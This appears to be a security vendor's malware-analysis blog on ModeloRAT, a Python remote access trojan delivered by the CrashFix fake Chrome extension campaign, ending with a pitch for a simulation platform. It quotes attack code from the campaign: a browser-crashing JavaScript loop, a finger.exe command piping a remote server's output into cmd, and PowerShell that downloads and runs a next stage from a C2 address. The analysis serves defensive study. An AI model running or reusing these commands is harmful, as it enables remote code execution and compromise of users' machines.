ModeloRAT Malware: How the CrashFix Campaign Delivers a Python RAT
| August 26, 2026
Key Takeaways
- ModeloRAT is a Python-based Windows Remote Access Trojan first observed in January 2026 targeting domain-joined hosts.
- The CrashFix campaign delivers it through a fake NexShield Chrome extension that crashes the browser, then shows a repair prompt.
- C2 traffic uses HTTP port 80 with RC4 encryption, zlib-compressed JSON, and adaptive beaconing intervals.
- Eight command types give operators full remote code execution, payload deployment, self-update, and clean implant termination.
- The Picus Platform simulates CrashFix ModeloRAT attacks so teams can validate security controls against this threat.
ModeloRAT is a Python-based Windows Remote Access Trojan first observed in January 2026, delivered only to domain-joined hosts in enterprise environments where a single foothold opens the way to Active Directory and lateral movement.
It arrives as the final payload of the CrashFix campaign, which starts with a malicious Chrome extension named NexShield that crashes the victim's browser on purpose, then displays a fake repair prompt that talks the user into running an attacker-supplied command [1].
In this blog, we explain how ModeloRAT works and how to validate your security controls against this malware.
ModeloRAT at a Glance
|
Field |
Detail |
|
Malware type |
Windows Remote Access Trojan written in Python |
|
Runtime |
Bundled portable Python environment under %APPDATA%\WPy64-31401, launched with pythonw.exe |
|
Transport |
HTTP over port 80, using POST requests to the beacon endpoint |
|
C2 data format |
System data serialized to JSON, encrypted with RC4 using a random 16-byte key, followed by the key and 0xFE 0xFE 0x00 0x01, then compressed with zlib |
|
Persistence |
HKCU\Software\Microsoft\Windows\CurrentVersion\Run with the value name MonitoringService |
|
Payload support |
Executables, DLLs, and Python scripts, PowerShell commands |
|
Obfuscation and anti-analysis |
Verbose naming, runtime C2 string construction, junk code, hidden subprocess windows, and disabled certificate verification |
What Is ModeloRAT?
ModeloRAT is a Python-based Windows Remote Access Trojan that runs through a bundled portable Python environment so execution does not depend on Python already being installed on the victim system.
The malware combines remote command execution, system reconnaissance, registry persistence, payload deployment, self-update capability, adaptive beaconing, and encrypted command-and-control communications. ModeloRAT supports executable files, DLLs, Python scripts, and arbitrary PowerShell commands, while its C2 traffic uses RC4 encryption.
ModeloRAT is also designed to complicate analysis. It uses unnecessarily long class and variable names, builds C2 IP addresses through string concatenation, hides subprocess windows, disables certificate verification through CERT_NONE, and ends with roughly 70 lines of junk code that do not contribute to the RAT's core functionality.
How Does ModeloRAT Work?
Initial Access and Delivery
It starts with a paid ad. A sponsored search result points to nexsnield[.]com, a typosquatted site pushing NexShield, a fake "Smart Ad Blocker" hosted on the official Chrome Web Store. The extension is a near-copy of uBlock Origin Lite. The only file that really differs is background.js, which is 3,276 bytes larger than the original.
The extension's configuration block defines the attacker infrastructure and the execution delay [1]:
|
// C2 and timing configuration read by the extension service worker var o = { BASE_URL: "https://www.nexsnield.com/", // attacker host for beacons and the fake alert page START_DELAY_MINUTES: 60, // nothing malicious runs for the first hour after install AFTER_START_PERIOD_MINUTES: 10 // after the first trigger, the payload re-runs every 10 minutes }; |
Once the hour is up, the extension attacks your browser. The makeBatch() function opens a billion chrome.runtime port connections in a tight loop, then re-queues itself right away. Memory and CPU climb until the browser locks up [1]:
|
async function u() { const swP = []; // array is never drained, so it grows without limit function launchBatchTestNetwork() { function makeBatch() { for (let i = 0; i < 1e9; i += 1) { // 1 billion port objects per batch swP.push(chrome.runtime.connect({ name: 'port-test' })); } setTimeout(makeBatch, 0) // queue another batch immediately, creating an infinite loop } makeBatch() } chrome.runtime.onConnect.addListener(port => { swP.push(port) // every inbound port adds another reference, burning more memory }); launchBatchTestNetwork(); } |
Before crashing the browser, the extension writes a timestamp to local storage. On the next startup, the handler reads that timestamp and opens a popup pointing at the attacker's /whats-new page, which renders the fake CrashFix alert. It tells you to press Win + R, then Ctrl + V, then Enter, while the extension copies a command to your clipboard disguised as edge.exe -fix-browser -hash="Z7sCq...".
The real command on your clipboard abuses finger.exe, an old Windows utility that fetches remote data and pipes it straight into the shell:
|
:: Start a minimized child shell so no console window appears :: Copy finger.exe out of System32 and rename it ct.exe to dodge name-based detection :: Pipe the server's response into cmd, running whatever the C2 sends back cmd /c start "" /min cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe confirm@199.217.98[.]108|cmd" |
The server answers with a large CharCode blob holding ROT-encoded PowerShell. Decoded, it pulls the next stage, runs it, and deletes the dropped file to clear evidence of the first stage [1]:
|
# Download the next stage into the roaming profile and run it from there Invoke-WebRequest -Uri "hxxp://199.217.98[.]108/b" -OutFile "$env:APPDATA\script.ps1" & "$env:APPDATA\script.ps1" # Delete the script so nothing is left on disk after it runs Remove-Item "$env:APPDATA\script.ps1" |
That script, wrapped in stacked Base64 and XOR layers, decides who gets ModeloRAT. It checks running processes against a list of more than 50 analysis tools and VM indicators and quits on any match. Then it reads the domain field from systeminfo and reports back with a marker, ABCD111 for standalone WORKGROUP hosts and BCDA222 for domain-joined ones, along with the antivirus products it pulled from the root/SecurityCenter2 WMI namespace.
For a domain-joined host, the C2 returns a command that grabs Winpython.zip, a Dropbox-hosted archive holding the portable WinPython build WPy64-31401, and starts the RAT with it.
Execution and Internal Structure
modes.py, the main RAT script, splits into four classes with verbose names [1]:
- UnnecessarilyProlongedCryptographicMechanismImplementationClass is plain RC4. It builds the S-box with the Key Scheduling Algorithm and generates the keystream with the Pseudo-Random Generation Algorithm.
- PrimaryOperationalController is responsible for reconnaissance, command execution, persistence, and the custom wire encoding.
- DataTransmissionManager generates and randomizes file paths for dropped payloads, pulling random filenames from %APPDATA% and %PROGRAMDATA% so new files sit among legitimate ones.
- CentralCommunicationController runs the beacon loop and dispatches whatever the server sends.
Persistence
On first run, ModeloRAT rewrites its own launch path to use pythonw.exe so restarts stay silent, then writes that command line to HKCU\Software\Microsoft\Windows\CurrentVersion\Run under the value name MonitoringService.
Secondary payloads get different cover. The RAT reads folder names under %APPDATA% and %PROGRAMDATA%, picks one belonging to real software such as Spotify, Adobe, or Discord, adds a random number, and uses that as the registry value name. You end up with entries like Spotify47 or Adobe2841.
Defense Evasion and Anti-Analysis
Most anti-analysis work happens before ModeloRAT reaches disk. The upstream PowerShell stage exits on analysis tools or VM artifacts.
Additionally, ModeloRAT obfuscates through verbosity. Every class, method, and variable uses an overlong name, such as instruction_result_repository instead of results. The last 70 lines are junk code, including an unused ExtraneousClassDefinition class, that pads the file and confuses static analysis [1]:
|
def generate_meaningless_calculation(): useless_variable_1 = random.randint(1, 1000) useless_variable_2 = useless_variable_1 ** 2 # computed, then never used useless_variable_3 = useless_variable_2 % useless_variable_1 for _ in range(100): useless_variable_3 += random.random() # the loop exists only to eat analyst attention return useless_variable_3 def create_unused_data_structures(): pointless_list = [i for i in range(1000) if i % 3 == 0] pointless_dict = {str(i): hashlib.sha256(str(i).encode()).hexdigest() for i in pointless_list} pointless_set = set(pointless_dict.values()) # no RAT logic ever touches these structures return pointless_list, pointless_dict, pointless_set |
At runtime, every subprocess spawns with CREATE_NO_WINDOW and with STARTF_USESHOWWINDOW set alongside wShowWindow=0, so PowerShell and other children never flash a console.
The RAT also turns off SSL certificate verification with CERT_NONE, so C2 traffic works with self-signed or mismatched certificates and no certificate errors show up in logs.
Command and Control
ModeloRAT beacons to two hardcoded C2 servers over plain HTTP on port 80. Both addresses, 170.168.103[.]208 and 158.247.252[.]178, are assembled character by character at runtime, so a string scan of the file never sees a full IP:
|
# The assembled C2 address "1" + "7" + "0" + "." + "1" + "6" + "8" + "." + "1" + "0" + "3" + "." + "2" + "0" + "8" |
The beacon URL is http://{C2_IP}:80/beacon/{client_id}. The client serializes its system metadata to JSON, encrypts it with RC4 using a random 16-byte key, appends that key to the ciphertext, and adds the 4-byte version marker \xfe\xfe\x00\x01. The whole thing gets zlib-compressed and sent as an HTTP POST request.
Beacon timing adapts. Normal polling runs every 300 seconds. When the server sends an activation command, the implant switches to active mode and polls as fast as 150 milliseconds by default, which gives the operator near-live control during hands-on-keyboard work, then falls back to normal after a configurable timeout. One failed check-in triggers a 150-second retry. Six or more consecutive failures push it out to 900 seconds, which keeps failed connection noise down.
Command Execution and Payload Deployment
Commands carry a numeric type from an enum named ArbitraryDataTypeClassification, and there are eight of them:
- EXECUTABLE_BINARY drops an EXE to a randomized path and runs it, with registry persistence as an option.
- DYNAMIC_LIBRARY drops a DLL and runs it through rundll32.exe.
- INTERPRETED_SCRIPT drops and runs another Python script with the bundled interpreter.
- SHELL_INSTRUCTION runs an arbitrary PowerShell command and returns the output.
- ACTIVATION_CONFIGURATION flips the implant into active mode and sets the polling rate.
- PERSISTENCE_MECHANISM rewrites the Run key if it was removed.
- VERSION_UPDATE swaps in a new binary from the server.
- TERMINATION_SIGNAL shuts the implant down cleanly.
Between them, the operator gets full remote code execution plus the ability to re-arm, upgrade, or retire the foothold without rerunning the whole delivery chain.
How Picus Simulates CrashFix ModeloRAT Attacks?
We strongly suggest simulating CrashFix ModeloRAT Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Platform. You can also test your defenses against hundreds of other malware variants, such as BRICKSTORM, VenomRAT, Chinotto, and Rustonotto, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for the CrashFix ModeloRAT Attacks:
|
Threat ID |
Threat Name |
Attack Module |
|
52911 |
CrashFix ModeloRAT Campaign |
Windows Endpoint |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Platform.
References
[1] A. Pham, T. Filip, and D. Lopez, “Dissecting CrashFix: KongTuke’s New Toy,” Huntress. Accessed: Aug. 25, 2026. [Online]. Available: https://www.huntress.com/blog/malicious-browser-extention-crashfix-kongtuke
